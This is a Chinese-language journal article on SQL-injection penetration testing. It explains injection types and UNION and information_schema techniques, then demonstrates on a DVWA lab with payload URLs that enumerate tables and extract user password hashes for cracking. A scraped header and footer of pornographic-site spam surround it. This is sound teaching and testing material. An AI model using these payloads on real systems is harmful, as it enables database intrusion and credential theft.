999精品在线视频,手机成人午夜在线视频,久久不卡国产精品无码,中日无码在线观看,成人av手机在线观看,日韩精品亚洲一区中文字幕,亚洲av无码人妻,四虎国产在线观看 ?

基于SQL注入漏洞的滲透測試技術(shù)研究

2018-04-15 16:14:25中興通訊股份有限公司張曉翠
電子世界 2018年14期
關(guān)鍵詞:數(shù)據(jù)庫用戶

中興通訊股份有限公司 張曉翠

一、前言

隨著網(wǎng)絡(luò)發(fā)展迅速,網(wǎng)絡(luò)覆蓋了人民生活的方方面面,個人及企業(yè)信息泄露事件頻頻發(fā)生,造成人身財產(chǎn)安隱患,由此引入的滲測試越來來越受到網(wǎng)絡(luò)維護(hù)人員的重視,在web漏洞中,SQL注入漏洞一直處于高泄露率,需要滲透測試人員在產(chǎn)品研發(fā)階段發(fā)現(xiàn)漏洞,并提交漏洞報告協(xié)助開發(fā)人員規(guī)避漏洞。

二、SQL注入漏洞簡介

SQL全稱是結(jié)構(gòu)化查詢語言,SQL注入是一種將惡意的SQL代碼插入或添加到應(yīng)用的輸入?yún)?shù)的攻擊,攻擊者探測出開發(fā)者編程過程中的漏洞,利用這些漏洞,巧妙的構(gòu)造SQL語句,獲取到數(shù)據(jù)庫中的涉密信息,甚至對數(shù)據(jù)庫系統(tǒng)的內(nèi)容進(jìn)行直接檢索或修改。

凡是與數(shù)庫交互的位置都有可能產(chǎn)生SQL注入漏洞,數(shù)據(jù)庫分為很多種,有 oracle、 MYSQL、SQL Serve、DB2等,操作數(shù)據(jù)庫的語言即SQL語句,如果攻擊者能夠?qū)εc服務(wù)器交互的SQL語句進(jìn)行修改,服務(wù)端沒有進(jìn)行應(yīng)有的過慮、校驗(yàn)等,那么就造成了SQL注入漏洞,使攻擊者能獲得某些敏感信息。

三、SQL注入漏洞類型及挖掘方法

SQL注入漏洞可以分為如下兩種:數(shù)字型和字符型。

1.數(shù)字型SQL注入漏洞

當(dāng)輸入的參數(shù)為整形時,如果存在SQL注入漏洞,則可以認(rèn)為是數(shù)字型注入。例如SQL語句:Select * from tablename where id=1;那么語句 Select * from tablename where id=1 and 1=2應(yīng)該是語句執(zhí)行成功,但是查詢結(jié)果為空,因?yàn)?=2始終為假。而語句 Selcet *from tablename where id=1 and 1=1應(yīng)該是語句執(zhí)行成功,且查詢結(jié)果與原語句一致。

通過構(gòu)造如上的輸入?yún)?shù)來判定是否存在數(shù)字型SQL注入漏洞。

2.字符型SQL注入漏洞

當(dāng)輸入的參數(shù)為字符型時,如果存在SQL注入漏洞,則可以認(rèn)為是字符型注入。例如SQL語句:Select * from tablename where username=’admin’;那么語句 Select * from tablename where username=’admin’ and 1=2應(yīng)該是語句執(zhí)行成功,但是查詢結(jié)果為空,因?yàn)?=2始終為假。而語句 Select * from tablename where username=’admin’ and 1=1應(yīng)該是語句執(zhí)行成功,且查詢結(jié)果與原語句一致。

通過構(gòu)造如上的輸入?yún)?shù)來判定是否存在字符型SQL注入漏洞,注意對于字符型注入,通常都需要閉合字符串,需要注釋掉多余的代碼。

四、SQL注入漏洞利用

發(fā)現(xiàn)SQL注入漏洞后,可以利用SQL標(biāo)準(zhǔn),查詢數(shù)據(jù)庫的敏感信息,常用語句如下:

1.order by語句,Select columnname1, columname2 from tablename where username=’admin’ order by paramindex,其中參數(shù)的序號,當(dāng)注入的 paramindex超出查詢參數(shù)個數(shù),則會返回失敗。

2.union select語句,聯(lián)合查詢語句要求 union內(nèi)部的 select語句查詢的列數(shù)必須一致,同時每條 select語句中列的順序必須相同。由此我們可以用來猜測字段數(shù),及查詢哪些字段可以用來暴敏感數(shù)據(jù)。

3.information_schema,在SQL注入中要獲取表格信息常用到這個數(shù)據(jù)庫視圖,類似與數(shù)據(jù)字典,提供了訪間數(shù)據(jù)庫元數(shù)據(jù)的方式,如數(shù)據(jù)庫名或表名,列類型,訪問權(quán)限等。其中常用的是informat ion _schema.tables和information_schema.columns。

五、SQL注入攻擊流程

1.發(fā)現(xiàn)注入漏洞;2.猜測字段數(shù);3.査詢數(shù)據(jù)庫版本、當(dāng)前用戶、系統(tǒng)用戶;4.獲取數(shù)據(jù)庫名;5.獲取數(shù)據(jù)庫表格,發(fā)現(xiàn)敏感表格;6.針對敏感表格數(shù)據(jù)進(jìn)行原數(shù)據(jù)暴露。

六、SQL注入漏洞實(shí)戰(zhàn)講解

通過對于dvwa平臺的SQL注入漏洞進(jìn)行攻擊演示。搭建dvwa漏洞平臺,進(jìn)入SQL注入漏洞練習(xí)頁面。

1.發(fā)現(xiàn)SQL注入漏洞:http://xxx/vulnerabilities/sqli/?id=1and1=2&Submit=Submit#;

2.猜測字段數(shù):

使用 order by方法:http://xxx/vulnerabilities/sqli/?id=1’ order by 2--+&Submit=Submit#;或者使用 union select方法:http://xxx/vulnerabilities/sqli/?id=1’ unionselect1, 2-- -&Submit= Submit#;發(fā)現(xiàn)字段數(shù)為2;

3.查詢數(shù)據(jù)庫版本,系統(tǒng)用戶,當(dāng)前用戶:

http://xxx/vulnerabilities/sqli/?id=1’ unionselect version(),system_user()-- -&Submit =Submit#;

http://xxx/vulnerabilities/sqli/?id=1’ unionselect version(),current_user()-- -&Submit =Submit#;

發(fā)現(xiàn)數(shù)據(jù)庫版本為5.5.36-log;系統(tǒng)用戶為root@localhost;當(dāng)前用戶為root@localhost;

4.獲取數(shù)據(jù)庫名長度:http://xxx/vulnerabilities/sq1i/?id=1’union select1, length(database())-- -&Submit=Submit#;獲取到數(shù)據(jù)庫名長度為4。

5.獲取數(shù)據(jù)庫名稱:http://xxx/vulnerabilities/sq1i/?id=1’ union select1, substring(database(),1,4)-- -&Submit=Submit#;對于有些對輸入?yún)?shù)進(jìn)行了限制,可以使用 ascii函數(shù)來分別獲取每個字節(jié):

http://xxx/vulnerabilities/sq1i/?id=1’ union select ascii(substring(database(),1,1)), ascii(substring(database(),2,1))-- -&Submit=Submit#;

http://xxx/vulnerabilities/sq1i/?id=1’ union select ascii(substring(database(),3,1)), ascii(substring(database(),4,1))-- -&Submit=Submit#;

獲取到ascii值第一位的是100,第二位是118,第三位是119,第四位是97;換算后為:dvwa。

6.獲取數(shù)據(jù)庫表格http://xxx/vulnerabilities/sqli/?id=1’ unionselect length(table_name), (table_name)frominformation_schema.tableswhere table_schema=database()-- -&Submit=Submit#;

從表格名稱發(fā)現(xiàn)可用敏感表格user;

7.獲取表格user的列名稱:

http://xxx/vulnerabilities/sqli/?id=1’ unionselect length(column_name),(column_name) from information_schema.column where table_schema=database() and table_name=’users’;-- --&Submit=Submit#;或者避免開雙引號可能引起語句閉合的影響,用十六進(jìn)制來表示user:http://xxx/vulnerabilities/sqli/?id=1’unionselect length(column_name),(column_name) from information_schema.column where table_schema=database() and table_name=0x7573657273-- - -&Submit=Submit#;發(fā)現(xiàn)關(guān)鍵字password;

8.獲取密碼 :

http://xxx/vulnerabilities/sqli/?id=1’ unionselect first_name,password form users -- -&Submit#;觀察密碼是32位,猜測是md5加加密,用md5破解網(wǎng)址破解密碼。最終完成獲取5個用戶密碼,獲得了用戶敏感信息。

七、總結(jié)

本文通過對SQL注入漏洞類型及原理的講解,并對dvwa平臺進(jìn)行SQL注入漏洞攻擊演示,對SQL注入漏洞滲透測試有指導(dǎo)意義。

猜你喜歡
數(shù)據(jù)庫用戶
數(shù)據(jù)庫
財經(jīng)(2017年15期)2017-07-03 22:40:49
數(shù)據(jù)庫
財經(jīng)(2017年2期)2017-03-10 14:35:35
關(guān)注用戶
商用汽車(2016年11期)2016-12-19 01:20:16
關(guān)注用戶
商用汽車(2016年6期)2016-06-29 09:18:54
數(shù)據(jù)庫
財經(jīng)(2016年15期)2016-06-03 07:38:02
關(guān)注用戶
商用汽車(2016年4期)2016-05-09 01:23:12
數(shù)據(jù)庫
財經(jīng)(2016年3期)2016-03-07 07:44:46
數(shù)據(jù)庫
財經(jīng)(2016年6期)2016-02-24 07:41:51
Camera360:拍出5億用戶
100萬用戶
主站蜘蛛池模板: 大陆精大陆国产国语精品1024| 2022国产91精品久久久久久| 亚洲第一极品精品无码| 国产成人精品亚洲日本对白优播| 夜夜爽免费视频| 中日韩一区二区三区中文免费视频| 国产成人精品在线1区| 新SSS无码手机在线观看| 亚洲永久色| 久久精品女人天堂aaa| 中文字幕无码中文字幕有码在线 | 在线观看视频一区二区| 高清不卡毛片| 一本大道无码日韩精品影视| 免费可以看的无遮挡av无码| 欧美日韩专区| 999在线免费视频| 日本人真淫视频一区二区三区| 免费无码网站| 成人午夜免费视频| 在线观看无码av五月花| 免费一级无码在线网站 | 2020国产免费久久精品99| 香蕉色综合| 亚洲av色吊丝无码| 日韩无码黄色| 97国产精品视频自在拍| 欧美激情视频一区二区三区免费| 福利在线不卡| 美女免费精品高清毛片在线视| 国产精品一区在线观看你懂的| 精品久久综合1区2区3区激情| 91福利片| 欧美日韩高清在线| 亚洲人成在线免费观看| 欧美一级高清免费a| 国产精品免费入口视频| 亚洲乱强伦| 亚洲美女一区| 亚洲福利一区二区三区| 51国产偷自视频区视频手机观看| 亚洲天堂网视频| 久久夜夜视频| 国禁国产you女视频网站| 免费a级毛片视频| 免费一级毛片在线播放傲雪网| 最新国产成人剧情在线播放| 手机永久AV在线播放| 国产激情无码一区二区三区免费| 人人看人人鲁狠狠高清| 国产在线视频导航| 成人夜夜嗨| 国产高清无码第一十页在线观看| 成人精品亚洲| 激情五月婷婷综合网| 久久毛片网| 91九色国产在线| 欧美精品v| 欧美视频在线不卡| 无码电影在线观看| 就去色综合| 久久一日本道色综合久久| 毛片在线看网站| 欧美一区二区三区不卡免费| 精品久久蜜桃| 91国内在线观看| 无码福利日韩神码福利片| 五月婷婷亚洲综合| 亚洲精品天堂自在久久77| 国产成a人片在线播放| 久久人人妻人人爽人人卡片av| 国产高清色视频免费看的网址| 亚洲精品无码不卡在线播放| 黑色丝袜高跟国产在线91| 激情视频综合网| 青青草原国产av福利网站| 99热这里只有精品国产99| 国产综合无码一区二区色蜜蜜| 久久久久九九精品影院| 国产1区2区在线观看| 久久青草免费91线频观看不卡| 在线观看精品自拍视频|